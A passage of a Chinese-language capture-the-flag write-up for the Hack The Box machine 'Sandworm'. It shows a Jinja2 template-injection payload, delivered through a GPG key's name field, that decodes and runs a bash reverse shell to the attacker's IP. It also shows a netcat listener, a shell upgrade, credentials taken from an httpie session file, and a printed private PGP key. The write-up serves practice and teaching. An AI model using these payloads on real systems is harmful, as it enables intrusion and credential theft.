8NSqWn3z1xMCzxGonvHwsvRf7j7xEL4beVotg1UkNkaLJqnTWBfqkm/7RKYnKVv+
BiwNF0LUjNFQf3rBzKxViXyy51/Z
=73Dn
-----END PGP PUBLIC KEY BLOCK-----

导出私钥

┌──(root㉿kali)-[~/Desktop]
└─# gpg -a -o private-file.key --export-secret-keys {{7*7}}
┌──(root㉿kali)-[~/Desktop]
└─# cat private-file.key 
-----BEGIN PGP PRIVATE KEY BLOCK-----

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
=/YXP
-----END PGP PRIVATE KEY BLOCK-----

制作和验证签名

┌──(root㉿kali)-[~/Desktop]
└─# echo 'life-time'|gpg --clear-sign 
┌──(root㉿kali)-[~/Desktop]
└─# echo 'life-time'|gpg --clear-sign  
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

life-time
-----BEGIN PGP SIGNATURE-----

iQGyBAEBCgAdFiEEmdxh848T1r2yc2sljiKfWGUL+z4FAmSdmXoACgkQjiKfWGUL
+z4BqQv44IchdXncKQYSbLmxrhsYSonbEc1s4oIsA2IeErTUHdwikjAJ9HE7xDjx
dfUBhQNDrBpr0ZwuNPtcA+2w6/N5cyCT8i29skG4Oh2s59qSZc8MXtOecI6jPv3i
Uc5z0XxQlUgRXtO11E2mx125IZZD5CkAlLfpPwrU6eDHWRsk03wyBTYz8kj0Xk3u
ZYRljKjTvYICLD39sy+W93Hi9matS89ud/sPjsPFvNfgOlwZoScJCxpqLQ5fGn5b
LGZqgBDVdFb4LdrCuTo6NdP919oywvmmCtPBkLpdnk6zVAtggDs7vJW3LAy+MkFM
KaEWxX2GBlGHeTdzSIpHtzCVYF1uMihKH8/JdgQCFKGWQDy8uZxvX1WBlBfSm4UE
Wm0Ts9nCP28c91mvfH2IrmR55St+v057vQ1OTIuqXxYEXu2HkRTY0EiZdXdgc8Mc
esvp8bhfnfHeggIbUczFGBjf71vdGYCFJMvivZGByB4dI3TY3gGChsY54yD4+egM
wSK3cnU=
=7bQW
-----END PGP SIGNATURE-----

这里我们的 49 成功变成了 49,证明确实存在 SSTI 漏洞

反弹 Shell

┌──(root㉿kali)-[~/Desktop]
└─# echo "bash -i >& /dev/tcp/10.10.16.48/4444 0>&1"|base64
YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNi40OC80NDQ0IDA+JjEK

首先我们将 reverse shell 转换为 base64 编码

{{ self.__init__.__globals__.__builtins__.__import__('os').popen('echo "YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNi40OC80NDQ0IDA+JjEK" | base64 -d | bash').read() }}

然后构造我们的 Reverse Shell

┌──(root㉿kali)-[~/Desktop]
└─# gpg --edit-key LucifielHack@qq.com
gpg (GnuPG) 2.2.40; Copyright (C) 2022 g10 Code GmbH
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.

私钥可用。

gpg: 正在检查信任度数据库
gpg: marginals needed: 3  completes needed: 1  trust model: pgp
gpg: 深度:0  有效性:  1  已签名:  0  信任度:0-,0q,0n,0m,0f,1u
gpg: 下次信任度数据库检查将于 2025-06-28 进行
sec  rsa3072/8E229F58650BFB3E
     创建于:2023-06-29  有效至:2025-06-28  可用于:SC  
     信任度:绝对        有效性:绝对
ssb  rsa3072/DA683892A79B6B19
     创建于:2023-06-29  有效至:2025-06-28  可用于:E   
[ 绝对 ] (1). {{7*7}} <LucifielHack@qq.com>

gpg> adduid
真实姓名: {{ self.__init__.__globals__.__builtins__.__import__('os').popen('echo "YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNi40OC80NDQ0IDA+JjEK" | base64 -d | bash').read() }}
电子邮件地址: LucifielHack@qq.com
注释: 
您选定了此用户标识:
    “{{ self.__init__.__globals__.__builtins__.__import__('os').popen('echo "YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNi40OC80NDQ0IDA+JjEK" | base64 -d | bash').read() }} <LucifielHack@qq.com>”

更改姓名(N)、注释(C)、电子邮件地址(E)或确定(O)/退出(Q)? o

sec  rsa3072/8E229F58650BFB3E
     创建于:2023-06-29  有效至:2025-06-28  可用于:SC  
     信任度:绝对        有效性:绝对
ssb  rsa3072/DA683892A79B6B19
     创建于:2023-06-29  有效至:2025-06-28  可用于:E   
[ 绝对 ] (1)  {{7*7}} <LucifielHack@qq.com>
[ 未知 ] (2). {{ self.__init__.__globals__.__builtins__.__import__('os').popen('echo "YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNi40OC80NDQ0IDA+JjEK" | base64 -d | bash').read() }} <LucifielHack@qq.com>
gpg> trust
sec  rsa3072/8E229F58650BFB3E
     创建于:2023-06-29  有效至:2025-06-28  可用于:SC  
     信任度:绝对        有效性:绝对
ssb  rsa3072/DA683892A79B6B19
     创建于:2023-06-29  有效至:2025-06-28  可用于:E   
[ 绝对 ] (1)  {{7*7}} <LucifielHack@qq.com>
[ 未知 ] (2). {{ self.__init__.__globals__.__builtins__.__import__('os').popen('echo "YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNi40OC80NDQ0IDA+JjEK" | base64 -d | bash').read() }} <LucifielHack@qq.com>

请决定您对这名用户能否正确地验证其他用户密钥
(通过查看护照,检查不同来源的的指纹等等)的相信程度

  1 = 我不知道或不作答
  2 = 我不相信
  3 = 我勉强相信
  4 = 我完全相信
  5 = 我绝对相信
  m = 回到主菜单

您的决定是什么? 5
您真的要把这个密钥设置成绝对信任?(y/N) y

sec  rsa3072/8E229F58650BFB3E
     创建于:2023-06-29  有效至:2025-06-28  可用于:SC  
     信任度:绝对        有效性:绝对
ssb  rsa3072/DA683892A79B6B19
     创建于:2023-06-29  有效至:2025-06-28  可用于:E   
[ 绝对 ] (1)  {{7*7}} <LucifielHack@qq.com>
[ 未知 ] (2). {{ self.__init__.__globals__.__builtins__.__import__('os').popen('echo "YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNi40OC80NDQ0IDA+JjEK" | base64 -d | bash').read() }} <LucifielHack@qq.com>

gpg> uid 1

sec  rsa3072/8E229F58650BFB3E
     创建于:2023-06-29  有效至:2025-06-28  可用于:SC  
     信任度:绝对        有效性:绝对
ssb  rsa3072/DA683892A79B6B19
     创建于:2023-06-29  有效至:2025-06-28  可用于:E   
[ 绝对 ] (1)* {{7*7}} <LucifielHack@qq.com>
[ 未知 ] (2). {{ self.__init__.__globals__.__builtins__.__import__('os').popen('echo "YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNi40OC80NDQ0IDA+JjEK" | base64 -d | bash').read() }} <LucifielHack@qq.com>

gpg> deluid
真的要移除此用户标识吗?(y/N) y

sec  rsa3072/8E229F58650BFB3E
     创建于:2023-06-29  有效至:2025-06-28  可用于:SC  
     信任度:绝对        有效性:绝对
ssb  rsa3072/DA683892A79B6B19
     创建于:2023-06-29  有效至:2025-06-28  可用于:E   
[ 未知 ] (1). {{ self.__init__.__globals__.__builtins__.__import__('os').popen('echo "YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNi40OC80NDQ0IDA+JjEK" | base64 -d | bash').read() }} <LucifielHack@qq.com>

gpg> save

导出公钥

┌──(root㉿kali)-[~/Desktop]
└─# ┌──(root㉿kali)-[~/Desktop]
└─# gpg --armor --export LucifielHack@qq.com > public.key
┌──(root㉿kali)-[~/Desktop]
└─# cat public.key      
-----BEGIN PGP PUBLIC KEY BLOCK-----

mQGNBGSdlHIBDADT20d9aSJjEaF5etEV39gJBLc7c35Q7cgwBUi9aW0FcrcYYWV5
AJJ2xloIWbavsgG1bjPo2SwgP0iRscX6yFRQ21OtVibkWB6fRfi7BWxc/mxEo0XU
lFO4ufb2taRMRmlxvg78xwia7WXIVF+UR/iHJeH/U+UbVh0hFZNQKrKiRHlzWagb
yGhNz8LDHMIPWUp1AiVqoMNXv4TwRM+SUMsQi7K862oixnJAjrgThIn6bwOPNnPm
spi7QUj8JcjEBvicVXlCaD1WkfkeNDHMq1xH3LW5/2gzTauouLsxBdAv3soImLXE
huyxG5arc6oekAGJ3wpizA1g8pJQ5DnUUe419cBnL0M+tMgZMboOauEOP1BLD9ZH
pwaktBoQnUXaj4jY3jHFHhyP+rWDvcFJshm/zy05nAKqRtA8cidlYtEpAuJrAArM
hwg6v73HVkpjiSWFihYRZhBUtjJsEekUzx7eyZtkb+KH7wmBqEgpBPoNZJR7HjD5
SohFOy3XWJe87UcAEQEAAbS2e3sgc2VsZi5fX2luaXRfXy5fX2dsb2JhbHNfXy5f
X2J1aWx0aW5zX18uX19pbXBvcnRfXygnb3MnKS5wb3BlbignZWNobyAiWW1GemFD
QXRhU0ErSmlBdlpHVjJMM1JqY0M4eE1DNHhNQzR4Tmk0ME9DODBORFEwSURBK0pq
RUsiIHwgYmFzZTY0IC1kIHwgYmFzaCcpLnJlYWQoKSB9fSA8THVjaWZpZWxIYWNr
QHFxLmNvbT6JAdQEEwEKAD4WIQSZ3GHzjxPWvbJzayWOIp9YZQv7PgUCZJ2cCAIb
AwUJA8JnAAULCQgHAgYVCgkICwIEFgIDAQIeAQIXgAAKCRCOIp9YZQv7PjmbDACL
xvM6NGYzKAvWSq8+YCFaoGayRrmdcxyFHVx/E06QaQGjyF8QSwA8xrvZR+/gT4Us
giFIgllk+n5s3Pu84S+TQir5AEMb68MAMHGXdGUqqv8KI82X90z8x9QZxOw7hHPU
rSp+uPecitxtI2j6uNNr/hx2KPTGlgyP+ns6NiAjGu+jIs0Z8fCtEzRTfcjgmYC3
aMgrfWmqy/S8E0TISNYm9htN8o9b+E1iVNCcE+Jc4BJULJnWwpEgjhsER0aWdCIM
OHuLHBCSGKKHFA0qmi39wuTWcjS3cd6NFVN4OVr124IKjV1vE/0Wo6VlSW1UuLYi
Zau812E1KwsVH/ASo1tcYCpmw282wt8zhICyJATPNExIjsTexMQoAtuNPFN2rs8k
7Km3yXy1jv29D2qw4RFjXYhcWNtnkzNG0B678w4uDOlU5wsge3slLdhx9jWXcE8d
PomLxGrC56KNbpfpMrWVMt2WoXzvavLY05lzGkKzJTXESIQ8lvA8RkVNMlDpf4u5
AY0EZJ2UcgEMANbLfcUVhcrdZuaRl4NnmzKabZ3swIZmBSO5ICQCw12Jqr6KlVa2
vFPtdOdTMnJwrGGJYqCEamek4M6RILovlxOfdDLaY+49TjEnDev+6GRk18OAO6gk
MYPpCfuBFk3XIK49p3BH9ucJQzMvJ6oa29L2a/pmlw5kA/aUDUteXJZUfHSYSd91
MBQQ8oIUzHe2SDB9effwtKWdM6IjWviZ5TpILF8v4HItueVE5dinxTZIaxHko0d0
RcEQV9zdjkZ1ZQjFVJr5Awz6JQGhf7lcPN60YxZAv++3hbtN7tv7l3jJuWxdDwsB
AAgOxuzk9Y7QmFdNAW9xhSLL3Ee4cWaj+RXq5hP9Cw60MzfpDaXHyY/TOtCC6VU3
u6ERRAfQ0GwmfSHzJZJtIVCu08NE3SOriLHbvGggdUTwlXtqaHg4PfLMwvMEEHN3
w/PmLGAE4bPmjUIB9tieloLMW/aJA79W7kcKpsy355dEZUojtzX7kRXm+ud30hqY
UKrVy5EvGypDkQARAQABiQG8BBgBCgAmFiEEmdxh848T1r2yc2sljiKfWGUL+z4F
AmSdlHICGwwFCQPCZwAACgkQjiKfWGUL+z7cXgv+LvtkBNdMqg5GcG3+/Ly6B1os
/jkR3R0bOO27CrUOw/Yt4KY71/Eza3+evid6u3qmBjVaIg09qZdDySThV/wVX0zP
1H095nIcNCxqFt8YIMjx9VfyI4yCYTWVEEYPlgTVEPkpJEFrd98v9HS3lZbEJ5Ha
Jxdp5/n09HhzfCHyNo4lVSgkeJr7Zo37/tppIUAgIWRzXHg+f0du0087K8Q0KVO8
OkKtfGoXWB/4wrPMeQMVaOke5SjN3T03OGrit462wYi4Iaucbck6qI3HjLCsjQat
GNV2yIbVbhIH1oAznu6Gd3XxbDrXOLvWtt8RkWDDPbblz/2EiC14VPhkPtJe9o0t
gryqJixVfFjdlTU+8ZlPCAsCz/YVt+S38arMHmC3BZh7ceS4v/Vy740SY07tObWJ
/vaVHQ6lSU+f8NSqWn3z1xMCzxGonvHwsvRf7j7xEL4beVotg1UkNkaLJqnTWBfq
km/7RKYnKVv+BiwNF0LUjNFQf3rBzKxViXyy51/Z
=vr51
-----END PGP PUBLIC KEY BLOCK-----

制作和验证签名

┌──(root㉿kali)-[~/Desktop]
└─# echo 'life-time'|gpg --clear-sign --out signed_message.key
┌──(root㉿kali)-[~/Desktop]
└─# cat signed_message.key 
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

life-time
-----BEGIN PGP SIGNATURE-----

iQGzBAEBCgAdFiEEmdxh848T1r2yc2sljiKfWGUL+z4FAmSdnkAACgkQjiKfWGUL
+z6ufgwA0imOKszK563JTpz9aRBZxdtNne4Y14u7FFHjgTT7UVQabBOeN143fnqv
BIS9/6KcHa4gurrnU87ouf/YNxgC2FPZ5k1nDY04iJJDnnkMEvpiSNgmWy2frIvp
gfLRd4kDJpwnkC6NE7ur8wxkcn2cpSUTsOgsVMhksazfAX6LJpOYmVSuwTRg6UYb
qKJnfeD7yDsXMV3kfGE9Kt3mo2uCnTKoomjKMYpnx4ZpP0Dcj8joxRXRFhP/UVbG
RGNlksQDGDBbA0Stfu90zyOYmLRZXwuxiDb4xUHKA9PC4fu8fjk6/pA4rWiKXiU2
WaZ5KRUxoPTxI8w3GUUae+R9fXPDBlAuICSLnM/Rbxo6pMZ3LOg5bgzUsIJhm63N
xCdJUB1bjQ8NXvNpy+dKZa3vd33M1kqq/MdzUnUQ0n6+M4LwUGoZYr+waO3XG2K1
4SVSgMlT36X9oKToDe93azhWwbGRcGNSkoo2EuADEjv5S7YfT/w8x8hvGfwfqmEI
Lf9gYb/D
=26lf
-----END PGP SIGNATURE-----

监听端口

nc -nvlp 4444
┌──(root㉿kali)-[~/Desktop]
└─# nc -nvlp 4444 
listening on [any] 4444 ...
connect to [10.10.16.48] from (UNKNOWN) [10.10.11.218] 55382
bash: cannot set terminal process group (-1): Inappropriate ioctl for device
bash: no job control in this shell
/usr/local/sbin/lesspipe: 1: dirname: not found
atlas@sandworm:/var/www/html/SSA$ whoami&&id^M

直接按回车会变成 ^M,去解决下伪终端的问题

Ctrl+Z 返回
stty raw -echo; fg
export TERM=xterm
stty rows 51 cols 237
python3 -c "import pty;pty.spawn('/bin/bash')";

即可成功解决这个问题

atlas@sandworm:/var/www/html/SSA$ whoami
Could not find command-not-found database. Run 'sudo apt update' to populate it.
whoami: command not found
atlas@sandworm:/var/www/html/SSA$ id
uid=1000(atlas) gid=1000(atlas) groups=1000(atlas)
atlas@sandworm:/var/www/html/SSA$ ls
SSA
atlas@sandworm:/var/www/html/SSA$ cd SSA
atlas@sandworm:/var/www/html/SSA/SSA$ ls
app.py       models.py    src     submissions
__init__.py  __pycache__  static  templates

成功拿到一个 shell,但是这里看着像是在容器里,而且也没有 flag

权限提升

silentobserver

atlas@sandworm:~$ ls -la
total 44
drwxr-xr-x 8 atlas  atlas   4096 Jun  7 13:44 .
drwxr-xr-x 4 nobody nogroup 4096 May  4 15:19 ..
lrwxrwxrwx 1 nobody nogroup    9 Nov 22  2022 .bash_history -> /dev/null
-rw-r--r-- 1 atlas  atlas    220 Nov 22  2022 .bash_logout
-rw-r--r-- 1 atlas  atlas   3771 Nov 22  2022 .bashrc
drwxrwxr-x 2 atlas  atlas   4096 Jun  6 08:49 .cache
drwxrwxr-x 3 atlas  atlas   4096 Feb  7 10:30 .cargo
drwxrwxr-x 4 atlas  atlas   4096 Jan 15 07:48 .config
drwx------ 4 atlas  atlas   4096 Jun 29 15:10 .gnupg
drwxrwxr-x 6 atlas  atlas   4096 Feb  6 10:33 .local
-rw-r--r-- 1 atlas  atlas    807 Nov 22  2022 .profile
drwx------ 2 atlas  atlas   4096 Feb  6 10:34 .ssh

在用户目录下有一个 .config文件夹

atlas@sandworm:~/.config$ ls -la
total 12
drwxrwxr-x 4 atlas  atlas   4096 Jan 15 07:48 .
drwxr-xr-x 8 atlas  atlas   4096 Jun  7 13:44 ..
dr-------- 2 nobody nogroup   40 Jun 29 08:31 firejail
drwxrwxr-x 3 nobody atlas   4096 Jan 15 07:48 httpie

.config目录下有firejail,确认是在沙箱中

atlas@sandworm:~/.config/httpie/sessions/localhost_5000$ ls -la
total 12
drwxrwx--- 2 nobody atlas 4096 May  4 17:30 .
drwxrwxr-x 3 nobody atlas 4096 Jan 15 07:48 ..
-rw-r--r-- 1 nobody atlas  611 May  4 17:26 admin.json
atlas@sandworm:~/.config/httpie/sessions/localhost_5000$ cat admin.json
{
    "__meta__": {
        "about": "HTTPie session file",
        "help": "https://httpie.io/docs#sessions",
        "httpie": "2.6.0"
    },
    "auth": {
        "password": "quietLiketheWind22",
        "type": null,
        "username": "silentobserver"
    },
    "cookies": {
        "session": {
            "expires": null,
            "path": "/",
            "secure": false,
            "value": "eyJfZmxhc2hlcyI6W3siIHQiOlsibWVzc2FnZSIsIkludmFsaWQgY3JlZGVudGlhbHMuIl19XX0.Y-I86w.JbELpZIwyATpR58qg1MGJsd6FkA"
        }
    },
    "headers": {
        "Accept": "application/json, */*;q=0.5"
    }
}

最后在 /home/atlas/.config/httpie/sessions/localhost_5000/admin.json中发现了用户 silentobserver的密码quietLiketheWind22

Username = silentobserver
Password = quietLiketheWind22
┌──(root㉿kali)-[~/Desktop]
└─# ssh silentobserver@10.10.11.218
silentobserver@10.10.11.218's password: 
Welcome to Ubuntu 22.04.2 LTS (GNU/Linux 5.15.0-73-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Thu Jun 29 03:21:56 PM UTC 2023

  System load:           0.0
  Usage of /:            89.6% of 11.65GB
  Memory usage:          22%
  Swap usage:            0%
  Processes:             215
  Users logged in:       0
  IPv4 address for eth0: 10.10.11.218
  IPv6 address for eth0: dead:beef::250:56ff:feb9:e9e3

  => / is using 89.6% of 11.65GB
  => There is 1 zombie process.


Expanded Security Maintenance for Applications is not enabled.

0 updates can be applied immediately.

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Thu Jun 29 15:21:58 2023 from 10.10.16.48
silentobserver@sandworm:~$ whoami&&id
silentobserver
uid=1001(silentobserver) gid=1001(silentobserver) groups=1001(silentobserver)

成功得到一个 User 权限的 Shell

silentobserver@sandworm:~$ cat user.txt 
8a61464d123533ae2536d7e54644b889

成功得到 User 权限的 Flag 文件

Root

2023/06/29 15:30:01 CMD: UID=0    PID=495842 | /bin/sh -c cd /opt/tipnet && /bin/echo "e" | /bin/sudo -u atlas /usr/bin/cargo run --offline

运行 pspy,检测到 root 用户正在用户 atlas 的上下文中运行用 Rust 开发的 tipnet 项目

tipnet

silentobserver@sandworm:/opt/tipnet/target/debug$ ./tipnet 
                                                     
             ,,                                      
MMP""MM""YMM db          `7MN.   `7MF'         mm    
P'   MM   `7               MMN.    M           MM    
     MM    `7MM `7MMpdMAo. M YMb   M  .gP"Ya mmMMmm  
     MM      MM   MM   `Wb M  `MN. M ,M'   Yb  MM    
     MM      MM   MM    M8 M   `MM.M 8M""""""  MM    
     MM      MM   MM   ,AP M     YMM YM.    ,  MM    
   .JMML.  .JMML. MMbmmd'.JML.    YM  `Mbmmd'  `Mbmo 
                  MM                                 
                .JMML.                               


Select mode of usage:
a) Upstream 
b) Regular (WIP)
c) Emperor (WIP)
d) SQUARE (WIP)
e) Refresh Indeces

logger

silentobserver@sandworm:/opt/crates/logger/src$ cat lib.rs 
extern crate chrono;

use std::fs::OpenOptions;
use std::io::Write;
use chrono::prelude::*;

pub fn log(user: &str, query: &str, justification: &str) {
    let now = Local::now();
    let timestamp = now.format("%Y-%m-%d %H:%M:%S").to_string();
    let log_message = format!("[{}] - User: {}, Query: {}, Justification: {}\n", timestamp, user, query, justification);

